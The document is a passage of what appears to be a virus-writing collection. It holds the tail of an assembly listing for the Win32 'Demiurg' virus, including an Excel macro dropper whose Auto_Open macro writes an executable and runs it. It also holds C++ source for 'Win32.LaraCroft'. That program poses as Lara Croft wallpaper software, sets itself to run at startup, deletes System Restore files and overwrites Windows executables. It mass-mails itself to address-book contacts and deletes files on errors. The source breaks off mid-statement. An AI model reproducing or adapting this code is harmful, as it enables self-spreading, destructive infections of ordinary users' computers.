db 05Ch, 000h, 04Dh, 000h, 049h, 000h, 043h, 000h
db 052h, 000h, 04Fh, 000h, 053h, 000h, 04Fh, 000h
db 046h, 000h, 054h, 000h, 020h, 000h, 053h, 000h
db 048h, 000h, 041h, 000h, 052h, 000h, 045h, 000h
db 044h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h
db 041h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h
db 041h, 000h, 033h, 000h, 033h, 000h, 032h, 000h
db 02Eh, 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h
db 023h, 000h, 056h, 000h, 069h, 000h, 073h, 000h
db 075h, 000h, 061h, 000h, 06Ch, 000h, 020h, 000h
db 042h, 000h, 061h, 000h, 073h, 000h, 069h, 000h
db 063h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h
db 072h, 000h, 020h, 000h, 041h, 000h, 070h, 000h
db 070h, 000h, 06Ch, 000h, 069h, 000h, 063h, 000h
db 061h, 000h, 074h, 000h, 069h, 000h, 06Fh, 000h
db 06Eh, 000h, 073h, 0E6h, 00Dh, 000h, 004h, 001h
db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h
db 030h, 000h, 038h, 000h, 031h, 000h, 033h, 000h
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h
db 07Dh, 000h, 023h, 000h, 031h, 000h, 02Eh, 000h
db 032h, 000h, 023h, 000h, 030h, 000h, 023h, 000h
db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 050h, 000h
db 072h, 000h, 06Fh, 000h, 067h, 000h, 072h, 000h
db 061h, 000h, 06Dh, 000h, 06Dh, 000h, 065h, 000h
db 05Ch, 000h, 04Dh, 000h, 069h, 000h, 063h, 000h
db 072h, 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h
db 066h, 000h, 074h, 000h, 020h, 000h, 04Fh, 000h
db 066h, 000h, 066h, 000h, 069h, 000h, 063h, 000h
db 065h, 000h, 05Ch, 000h, 04Fh, 000h, 066h, 000h
db 066h, 000h, 069h, 000h, 063h, 000h, 065h, 000h
db 05Ch, 000h, 045h, 000h, 058h, 000h, 043h, 000h
db 045h, 000h, 04Ch, 000h, 038h, 000h, 02Eh, 000h
db 04Fh, 000h, 04Ch, 000h, 042h, 000h, 023h, 000h
db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h
db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h
db 074h, 000h, 020h, 000h, 045h, 000h, 078h, 000h
db 063h, 000h, 065h, 000h, 06Ch, 000h, 020h, 000h
db 038h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h
db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h
db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h
db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h
db 072h, 000h, 079h, 0E6h, 00Dh, 000h, 0B8h, 000h
db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h
db 030h, 000h, 034h, 000h, 033h, 000h, 030h, 000h
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h
db 07Dh, 000h, 023h, 000h, 032h, 000h, 02Eh, 000h
db 030h, 000h, 023h, 000h, 030h, 000h, 023h, 000h
db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 057h, 000h
db 049h, 000h, 04Eh, 000h, 044h, 000h, 04Fh, 000h
db 057h, 000h, 053h, 000h, 05Ch, 000h, 053h, 000h
db 059h, 000h, 053h, 000h, 054h, 000h, 045h, 000h
db 04Dh, 000h, 05Ch, 000h, 053h, 000h, 054h, 000h
db 044h, 000h, 04Fh, 000h, 04Ch, 000h, 045h, 000h
db 032h, 000h, 02Eh, 000h, 054h, 000h, 04Ch, 000h
db 042h, 000h, 023h, 000h, 04Fh, 000h, 04Ch, 000h
db 045h, 000h, 020h, 000h, 041h, 000h, 075h, 000h
db 074h, 000h, 06Fh, 000h, 06Dh, 000h, 061h, 000h
db 074h, 000h, 069h, 000h, 06Fh, 000h, 06Eh, 0E6h
db 00Dh, 000h, 0E0h, 000h, 02Ah, 000h, 05Ch, 000h
db 047h, 000h, 07Bh, 000h, 036h, 000h, 032h, 000h
db 041h, 000h, 033h, 000h, 032h, 000h, 043h, 000h
db 036h, 000h, 032h, 000h, 02Dh, 000h, 041h, 000h
db 033h, 000h, 036h, 000h, 044h, 000h, 02Dh, 000h
db 031h, 000h, 031h, 000h, 044h, 000h, 033h, 000h
db 02Dh, 000h, 041h, 000h, 035h, 000h, 030h, 000h
db 030h, 000h, 02Dh, 000h, 041h, 000h, 036h, 000h
db 046h, 000h, 033h, 000h, 044h, 000h, 044h, 000h
db 041h, 000h, 044h, 000h, 038h, 000h, 032h, 000h
db 033h, 000h, 039h, 000h, 07Dh, 000h, 023h, 000h
db 032h, 000h, 02Eh, 000h, 030h, 000h, 023h, 000h
db 030h, 000h, 023h, 000h, 043h, 000h, 03Ah, 000h
db 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh, 000h
db 044h, 000h, 04Fh, 000h, 057h, 000h, 053h, 000h
db 05Ch, 000h, 053h, 000h, 059h, 000h, 053h, 000h
db 054h, 000h, 045h, 000h, 04Dh, 000h, 05Ch, 000h
db 04Dh, 000h, 053h, 000h, 046h, 000h, 06Fh, 000h
db 072h, 000h, 06Dh, 000h, 073h, 000h, 02Eh, 000h
db 054h, 000h, 057h, 000h, 044h, 000h, 023h, 000h
db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h
db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h
db 074h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h
db 072h, 000h, 06Dh, 000h, 073h, 000h, 020h, 000h
db 032h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h
db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h
db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h
db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h
db 072h, 000h, 079h, 0E6h, 00Bh, 000h, 001h, 000h
db 0E4h, 000h, 02Ah, 000h, 05Ch, 000h, 047h, 000h
db 07Bh, 000h, 036h, 000h, 032h, 000h, 041h, 000h
db 033h, 000h, 032h, 000h, 043h, 000h, 036h, 000h
db 033h, 000h, 02Dh, 000h, 041h, 000h, 033h, 000h
db 036h, 000h, 044h, 000h, 02Dh, 000h, 031h, 000h
db 031h, 000h, 044h, 000h, 033h, 000h, 02Dh, 000h
db 081h, 000h, 000h, 000h, 082h, 000h, 000h, 000h
db 083h, 000h, 000h, 000h, 084h, 000h, 000h, 000h
db 085h, 000h, 000h, 000h, 086h, 000h, 000h, 000h
db 087h, 000h, 000h, 000h, 088h, 000h, 000h, 000h
db 089h, 000h, 000h, 000h, 08Ah, 000h, 000h, 000h
db 08Bh, 000h, 000h, 000h, 08Ch, 000h, 000h, 000h
db 08Dh, 000h, 000h, 000h, 08Eh, 000h, 000h, 000h
db 08Fh, 000h, 000h, 000h, 090h, 000h, 000h, 000h
db 091h, 000h, 000h, 000h, 092h, 000h, 000h, 000h
db 093h, 000h, 000h, 000h, 094h, 000h, 000h, 000h
db 095h, 000h, 000h, 000h, 096h, 000h, 000h, 000h
db 097h, 000h, 000h, 000h, 098h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 09Ah, 000h, 000h, 000h
db 09Bh, 000h, 000h, 000h, 09Ch, 000h, 000h, 000h
db 09Dh, 000h, 000h, 000h, 09Eh, 000h, 000h, 000h
db 09Fh, 000h, 000h, 000h, 0A0h, 000h, 000h, 000h
db 0A1h, 000h, 000h, 000h, 0A2h, 000h, 000h, 000h
db 0A3h, 000h, 000h, 000h, 0A4h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 0A6h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 0A8h, 000h, 000h, 000h
db 0A9h, 000h, 000h, 000h, 0AAh, 000h, 000h, 000h
db 0ABh, 000h, 000h, 000h, 0ACh, 000h, 000h, 000h
db 0ADh, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh
db 0AFh, 000h, 000h, 000h, 0B0h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 0B2h, 000h, 000h, 000h
db 0B3h, 000h, 000h, 000h, 0B4h, 000h, 000h, 000h
db 0B5h, 000h, 000h, 000h, 0B6h, 000h, 000h, 000h
db 0B7h, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh
db 0B9h, 000h, 000h, 000h, 0FEh, 0E6h, 0FFh, 0FFh
db 0E6h, 01Ch, 0FFh, 041h, 000h, 035h, 000h, 030h
db 000h, 030h, 000h, 02Dh, 000h, 041h, 000h, 036h
db 000h, 046h, 000h, 033h, 000h, 044h, 000h, 044h
db 000h, 041h, 000h, 044h, 000h, 038h, 000h, 032h
db 000h, 033h, 000h, 039h, 000h, 07Dh, 000h, 023h
db 000h, 032h, 000h, 02Eh, 000h, 030h, 000h, 023h
db 000h, 030h, 000h, 023h, 000h, 043h, 000h, 03Ah
db 000h, 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh
db 000h, 044h, 000h, 04Fh, 000h, 057h, 000h, 053h
db 000h, 05Ch, 000h, 054h, 000h, 045h, 000h, 04Dh
db 000h, 050h, 000h, 05Ch, 000h, 056h, 000h, 042h
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h
db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh
db 000h, 073h, 000h, 02Eh, 000h, 045h, 000h, 058h
db 000h, 044h, 000h, 023h, 000h, 04Dh, 000h, 069h
db 000h, 063h, 000h, 072h, 000h, 06Fh, 000h, 073h
db 000h, 06Fh, 000h, 066h, 000h, 074h, 000h, 020h
db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh
db 000h, 073h, 000h, 020h, 000h, 032h, 000h, 02Eh
db 000h, 030h, 000h, 020h, 000h, 04Fh, 000h, 062h
db 000h, 06Ah, 000h, 065h, 000h, 063h, 000h, 074h
db 000h, 020h, 000h, 04Ch, 000h, 069h, 000h, 062h
db 000h, 072h, 000h, 061h, 000h, 072h, 000h, 079h
db 0E6h, 00Bh, 000h, 001h, 000h, 000h, 000h, 0E1h
db 02Eh, 045h, 00Dh, 08Fh, 0E0h, 01Ah, 010h, 085h
db 02Eh, 002h, 060h, 08Ch, 04Dh, 00Bh, 0B4h, 000h
db 000h, 004h, 001h, 02Ah, 000h, 05Ch, 000h, 047h
db 000h, 07Bh, 000h, 032h, 000h, 044h, 000h, 046h
db 000h, 038h, 000h, 044h, 000h, 030h, 000h, 034h
db 000h, 043h, 000h, 02Dh, 000h, 035h, 000h, 042h
db 000h, 046h, 000h, 041h, 000h, 02Dh, 000h, 031h
db 000h, 030h, 000h, 031h, 000h, 042h, 000h, 02Dh
db 000h, 042h, 000h, 044h, 000h, 045h, 000h, 035h
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 041h
db 000h, 041h, 000h, 030h, 000h, 030h, 000h, 034h
db 000h, 034h, 000h, 044h, 000h, 045h, 000h, 035h
db 000h, 032h, 000h, 07Dh, 000h, 023h, 000h, 032h
db 000h, 02Eh, 000h, 030h, 000h, 023h, 000h, 030h
db 000h, 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch
db 000h, 050h, 000h, 052h, 000h, 04Fh, 000h, 047h
db 000h, 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 049h
db 000h, 043h, 000h, 052h, 000h, 04Fh, 000h, 053h
db 000h, 04Fh, 000h, 046h, 000h, 054h, 000h, 020h
db 000h, 04Fh, 000h, 046h, 000h, 046h, 000h, 049h
db 000h, 043h, 000h, 045h, 000h, 05Ch, 000h, 04Fh
db 000h, 046h, 000h, 046h, 000h, 049h, 000h, 043h
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h
db 000h, 04Fh, 000h, 039h, 000h, 037h, 000h, 02Eh
db 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h, 023h
db 000h, 04Dh, 000h, 069h, 000h, 063h, 000h, 072h
db 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h
db 000h, 074h, 000h, 020h, 000h, 04Fh, 000h, 066h
db 000h, 066h, 000h, 069h, 000h, 063h, 000h, 065h
db 000h, 020h, 000h, 038h, 000h, 02Eh, 000h, 030h
db 000h, 020h, 000h, 04Fh, 000h, 062h, 000h, 06Ah
db 000h, 065h, 000h, 063h, 000h, 074h, 000h, 020h
db 000h, 04Ch, 000h, 069h, 000h, 062h, 000h, 072h
db 000h, 061h, 000h, 072h, 000h, 079h, 0E6h, 00Dh
db 000h, 003h, 000h, 002h, 000h, 002h, 000h, 001h
db 000h, 003h, 000h, 004h, 002h, 000h, 000h, 006h
db 002h, 001h, 000h, 008h, 002h, 000h, 000h, 010h
db 002h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh
db 0FFh, 000h, 000h, 0E8h, 005h, 0C0h, 038h, 003h
db 000h, 0E6h, 00Ah, 0FFh, 000h, 000h, 001h, 000h
db 0E6h, 026h, 0FFh, 002h, 000h, 0E6h, 00Ah, 0FFh
db 001h, 0E6h, 013h, 000h, 0B5h, 031h, 003h, 000h
db 022h, 000h, 044h, 000h, 069h, 000h, 065h, 000h
db 073h, 000h, 065h, 000h, 041h, 000h, 072h, 000h
db 062h, 000h, 065h, 000h, 069h, 000h, 074h, 000h
db 073h, 000h, 06Dh, 000h, 061h, 000h, 070h, 000h
db 070h, 000h, 065h, 000h, 00Ah, 000h, 034h, 033h
db 038h, 063h, 030h, 030h, 035h, 065h, 038h, 000h
db 003h, 000h, 02Ah, 044h, 001h, 015h, 002h, 0FFh
db 0FFh, 0B7h, 031h, 0E6h, 007h, 000h, 002h, 000h
db 000h, 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh
db 010h, 000h, 054h, 000h, 061h, 000h, 062h, 000h
db 065h, 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h
db 031h, 000h, 00Ah, 000h, 035h, 033h, 038h, 063h
db 030h, 030h, 035h, 065h, 038h, 000h, 003h, 000h
db 02Ah, 044h, 001h, 019h, 002h, 0FFh, 0FFh, 0B9h
db 031h, 0E6h, 006h, 000h, 018h, 002h, 000h, 000h
db 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh, 00Eh
db 000h, 044h, 000h, 065h, 000h, 06Dh, 000h, 069h
db 000h, 075h, 000h, 072h, 000h, 067h, 000h, 00Ah
db 000h, 064h, 033h, 038h, 063h, 030h, 030h, 035h
db 066h, 036h, 000h, 003h, 000h, 02Ah, 044h, 001h
db 01Ch, 002h, 0FFh, 0FFh, 0BBh, 031h, 0E6h, 006h
macro_dropper_size EQU ($ - macro_dropper)
main_macro_code:
db "Attribute VB_Name = ""Demiurg""", 0Dh, 0Ah
db "Public a", 0Dh, 0Ah
db "Sub Auto_Open()", 0Dh, 0Ah
db "Open ""C:\demiurg.exe"" For Binary As #1", 0Dh, 0Ah
db "b", 0Dh, 0Ah
db "c", 0Dh, 0Ah
db "d", 0Dh, 0Ah
db "e", 0Dh, 0Ah
db "f", 0Dh, 0Ah
db "g", 0Dh, 0Ah
db "Close #1", 0Dh, 0Ah
db "t=Shell(""C:\demiurg.exe"",vbNormalFocus)", 0Dh, 0Ah
db "End Sub", 0Dh, 0Ah
db "Sub w()", 0Dh, 0Ah
db "For i=0 To 127", 0Dh, 0Ah
db "v$=Chr$(a(i))", 0Dh, 0Ah
db "Put #1,,v$", 0Dh, 0Ah
db "Next", 0Dh, 0Ah
end_sub:
db "End Sub", 0Dh, 0Ah
main_macro_code_size EQU ($ - main_macro_code)
sub_header:
sub_name EQU byte ptr ($ + 4)
db "Sub b()", 0Dh, 0Ah
regkey db "Software\Microsoft\Office\8.0\Excel", 0
office_version_number EQU byte ptr (offset regkey+26)
subkey_97 db "Microsoft Excel", 0
subkey_2K db "Security", 0
subkey_InstallRoot db "InstallRoot", 0
regvalue_options db "Options6", 0
regvalue_2K db "Level", 0
regvalue_path db "Path", 0
demiurg_xls db "\xlstart\demiurg.xls", 0
macro_filename db "C:\demiurg.sys", 0
kernel32_dll db "\kernel32.dll", 0
dos_exe_size dd ?
resource_table dd ?
heap_buffer dd ?
dummy_dword dd ?
filename_ofs dd ?
attributes dd ?
CreationTime dq ?
LastAccessTime dq ?
LastWriteTime dq ?
filesize dd ?
filehandle dd ?
maphandle dd ?
mapbase dd ?
virus_RVA dd ?
virus_start dd ?
kernel32 dd 0
kernel32name db "KERNEL32", 0
GetModuleHandleA db "GetModuleHandleA", 0
l_GMH EQU $ - offset GetModuleHandleA
kernel32_API_names_table:
n_GlobalAlloc db "GlobalAlloc", 0
n_GlobalFree db "GlobalFree", 0
n_GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
n_GetSystemDirectoryA db "GetSystemDirectoryA", 0
n_lstrcatA db "lstrcatA", 0
n_LoadLibraryA db "LoadLibraryA", 0
n_CloseHandle db "CloseHandle", 0
n_GetFileSize db "GetFileSize", 0
n_GetFileTime db "GetFileTime", 0
n_SetFileTime db "SetFileTime", 0
n_SetEndOfFile db "SetEndOfFile", 0
n_SetFilePointer db "SetFilePointer", 0
n_CreateFileMappingA db "CreateFileMappingA", 0
n_MapViewOfFile db "MapViewOfFile", 0
n_UnmapViewOfFile db "UnmapViewOfFile", 0
n_WideCharToMultiByte db "WideCharToMultiByte", 0
number_of_hooked_APIs EQU 7
kernel32_API_address_table:
GlobalAlloc dd ?
GlobalFree dd ?
GetWindowsDirectoryA dd ?
GetSystemDirectoryA dd ?
lstrcatA dd ?
LoadLibraryA dd ?
CloseHandle dd ?
GetFileSize dd ?
GetFileTime dd ?
SetFileTime dd ?
SetEndOfFile dd ?
SetFilePointer dd ?
CreateFileMappingA dd ?
MapViewOfFile dd ?
UnmapViewOfFile dd ?
WideCharToMultiByte dd ?
CreateFileA dd ?
GetFileAttributesA dd ?
SetFileAttributesA dd ?
CopyFileA dd ?
MoveFileExA dd ?
number_of_kernel32_APIs EQU (($ - kernel32_API_address_table) / 4)
advapi32_dll db "ADVAPI32.dll", 0
advapi32_API_names_table:
n_RegOpenKeyExA db "RegOpenKeyExA", 0
n_RegCreateKeyExA db "RegCreateKeyExA", 0
n_RegQueryValueExA db "RegQueryValueExA", 0
n_RegSetValueExA db "RegSetValueExA", 0
n_RegCloseKey db "RegCloseKey", 0
advapi32_API_address_table:
RegOpenKeyExA dd ?
RegCreateKeyExA dd ?
RegQueryValueExA dd ?
RegSetValueExA dd ?
RegCloseKey dd ?
number_of_advapi32_APIs EQU (($ - advapi32_API_address_table) / 4)
imagehlp_dll db "IMAGEHLP.dll", 0
CheckSumMappedFile db "CheckSumMappedFile", 0
virus_end:
.code
dummy_host:
push 0
push offset caption
push offset message
push 0
call MessageBoxA
push 0
call ExitProcess
end start
────────────────────────────────────────────────────────────[LARACROFT.CPP]───
#include "laracroft.h"
#pragma hdrstop
#pragma warning (disable: 4068)
#pragma warning (disable: 4001)
char LaraWinDir[256],LaraSysDir[256],LaraPath[256];
HKEY RestoreKey,LaraNTKey,LaraWinKey,LaraInstallKey,LaraNewKey;
HANDLE LaraHnd,LaraHndTime;
HMODULE ServiceLib,MessLib;
int Err,ErrSend;
typedef DWORD(*RegServProc)(DWORD,DWORD);
typedef ULONG(*FriendMess)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
typedef ULONG(*FriendFound)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
typedef ULONG(*FreeMem)(LPVOID);
LPSTR Friend = "a";
#pragma argsused
int PASCAL WinMain
(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpszCmdLine,
int nCmdShow
)
{
//Win32.LaraCroft par ZeMacroKiller98
//Copyright (c) 2000 par ZeMacroKiller98
//Un virus made in FRANCE!!!!!!!!!
WIN32_FIND_DATA LaraHost;
OSVERSIONINFO CurVerInfo;
FILETIME LaraCreateTime,LaraLstAccTime,LaraLstWriTime;
SYSTEMTIME LaraTime;
FriendMess MAPIFriendMess;
FriendFound MAPIFriendFound;
FreeMem MAPIFreeMem;
RegServProc RegisServProcss;
ServiceLib = LoadLibrary("kernel32.dll");
MessLib = LoadLibrary("mapi32.dll");
SearchPath(NULL,_argv[0],NULL,sizeof(LaraPath),LaraPath,NULL);
CurVerInfo.dwOSVersionInfoSize = sizeof(CurVerInfo);
GetVersionEx(&CurVerInfo);
if(CurVerInfo.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&LaraNTKey);
RegSetValueEx(LaraNTKey,"LaraWallpaper",0,REG_SZ,LaraPath,sizeof(LaraPath));
RegCloseKey(LaraNTKey);
}
else
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&LaraWinKey);
RegSetValueEx(LaraWinKey,"LaraWallpaper",0,REG_SZ,LaraPath,sizeof(LaraPath));
RegCloseKey(LaraWinKey);
}
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\LaraCroft\\Install",0,KEY_ALL_ACCESS,&
LaraInstallKey)!=ERROR_SUCCESS)
{
MessageBox(NULL,
"Hi Friends,\nThis software downloads automatically new wallpaper on Lara
Croft official site\nIf you have any questions, go to www.eidosinterative.com\nPlease
register it on our site at www.eidosinteractive.com\\Lara\\Register\n\tThanks to have take
this software\n\t\t\tLara Croft",
"Lara Wallpaper Download Software",
MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
//Anti-WinMe Restauration File
GetSystemDirectory(LaraSysDir, sizeof(LaraSysDir));
if(SetCurrentDirectory(lstrcat(LaraSysDir,"\\RESTORE"))!=0)
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&RestoreKey);
RegDeleteValue(RestoreKey,"*StateMgr");
RegCloseKey(RestoreKey);
DeleteFile("rstrui.exe");
}
GetWindowsDirectory(LaraWinDir,sizeof(LaraWinDir));
SetCurrentDirectory(LaraWinDir);
LaraHnd = FindFirstFile("*.exe",&LaraHost);
LaraHoteTrouve:
LaraHndTime = CreateFile(LaraHost.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
GetFileTime(LaraHndTime,&LaraCreateTime,&LaraLstAccTime,&LaraLstWriTime);
CloseHandle(LaraHndTime);
if((lstrcmp(LaraHost.cFileName,"emm386.exe")==0)||(lstrcmp(LaraHost.cFileName,
"setver.exe")==0))
goto FichierNonInfecte;
CopyFile(_argv[0],LaraHost.cFileName,FALSE);
LaraHndTime = CreateFile(LaraHost.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
SetFileTime(LaraHndTime,&LaraCreateTime,&LaraLstAccTime,&LaraLstWriTime);
CloseHandle(LaraHndTime);
FichierNonInfecte:
if(FindNextFile(LaraHnd,&LaraHost)==TRUE)
goto LaraHoteTrouve;
FindClose(LaraHnd);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\LaraCroft\\Install",&LaraNewKey);
RegCloseKey(LaraNewKey);
MessageBox(NULL,"Please send this software about me to your friends...\nYou can
select friends into your address book, now\n\t\t\tLara Croft","Lara Wallpaper Download
Software",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
MAPIFriendMess = (FriendMess)GetProcAddress(MessLib,"MAPISendMail");
MAPIFriendFound = (FriendFound)GetProcAddress(MessLib,"MAPIResolveName");
MAPIFreeMem = (FreeMem)GetProcAddress(MessLib,"MAPIFreeBuffer");
if((MAPIFriendMess==NULL)||(MAPIFriendFound==NULL)||(MAPIFreeMem==NULL))
{
MessageBox(NULL,"MAPI not installed on this computer\nPlease refer to help
to install it","Lara Wallpaper Download Software",MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
SetCurrentDirectory(LaraSysDir);
DeleteFile("*.*");
ExitProcess(0);
}
MapiMessage MyMessage;
MapiRecipDesc stRecip;
MapiFileDesc stFile;
lpMapiRecipDesc lpRecip;
stFile.ulReserved = 0;
stFile.flFlags = 0L;
stFile.nPosition = (ULONG)-1;
stFile.lpszPathName = LaraPath;
stFile.lpszFileName = NULL;
stFile.lpFileType = NULL;
UnResolve:
Err = (MAPIFriendFound)(lhSessionNull,0L,Friend,MAPI_DIALOG,0L,&lpRecip);
if(Err!=SUCCESS_SUCCESS)
{
switch(Err){
case MAPI_E_AMBIGUOUS_RECIPIENT:
MessageBox(NULL,"Please select new email address into your address
book","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_UNKNOWN_RECIPIENT:
MessageBox(NULL,"Any email address with current letter","Lara
Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_FAILURE:
MessageBox(NULL,"Unknown error into your address book","Lara
Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_INSUFFICIENT_MEMORY:
MessageBox(NULL,"No enought memory to launch this
application\nPlease close other application to continue","Lara Wallpaper Download Software",
MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_NOT_SUPPORTED:
MessageBox(NULL,"Email software not installed\nPlese refer to your
help for more information","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|
MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_USER_ABORT:
MessageBox(NULL,"You have cancelled this dialog box","Lara Wallpaper
Download software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
}
goto UnResolve;
}
stRecip.ulReserved = lpRecip->ulReserved;
stRecip.ulRecipClass = MAPI_TO;
stRecip.lpszName = lpRecip->lpszName;
stRecip.lpszAddress = lpRecip->lpszAddress;
stRecip.ulEIDSize = lpRecip->ulEIDSize;
stRecip.lpEntryID = lpRecip->lpEntryID;
MyMessage.ulReserved = 0;
MyMessage.lpszSubject = "Lara Wallpaper Download Software";
MyMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI found on the net
a new interesting software about Lara Croft.\nI send you because it's very coooooool!!!\nTry
it and say me your opinion about it\n\n\tSee you soon and enjoy to have it")));
MyMessage.lpszMessageType = NULL;
MyMessage.lpszDateReceived = NULL;
MyMessage.lpszConversationID = NULL;
MyMessage.flFlags = 0L;
MyMessage.lpOriginator = NULL;
MyMessage.nRecipCount = 1;
MyMessage.lpRecips = &stRecip;
MyMessage.nFileCount = 1;
MyMessage.lpFiles = &stFile;
ErrSend = (MAPIFriendMess)(lhSessionNull,0L,&MyMessage,0L,0L);
if(ErrSend!=SUCCESS_SUCCESS)
{
MessageBox(NULL,"Sending email create error into your system","Lara Wallpaper
Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
}
FreeLibrary(MessLib);
}
RegCloseKey(LaraInstallKey);
RegisServProcss = (RegServProc)GetProcAddress(ServiceLib,"RegisterServiceProcess");
STARTUPINFO LaraStartInfo;
PROCESS_INFORMATION LaraProcInfo;
LaraStartInfo.cb = sizeof(STARTUPINFO);
LaraStartInfo.lpReserved = NULL;
LaraStartInfo.lpReserved2 = NULL;
LaraStartInfo.cbReserved2 = 0;
LaraStartInfo.lpDesktop = NULL;
LaraStartInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
if(CreateProcess(LaraPath,
NULL,
(LPSECURITY_ATTRIBUTES)NULL,
(LPSECURITY_ATTRIBUTES)NULL,
FALSE,
0,
NULL,
NULL,
&LaraStartInfo,
&LaraProcInfo))
{
CloseHandle(LaraProcInfo.hProcess);
CloseHandle(LaraProcInfo.hThread);
}
RegisServProcss(LaraProcInfo.dwProcessId,1);
if((LaraTime.wHour==10)&&(LaraTime.wMinute==0)&&(LaraTime.wSecond==0))
{
MessageBox(NULL,"It's time to connect at Lara Croft official web site\nThanks to
Click on OK to continue","Lara Wallpaper Download Software",MB_OK|MB_ICONEXCLAMATION|
MB_SYSTEMMODAL);
WritePrivateProfileString("InternetShortcut","URL",
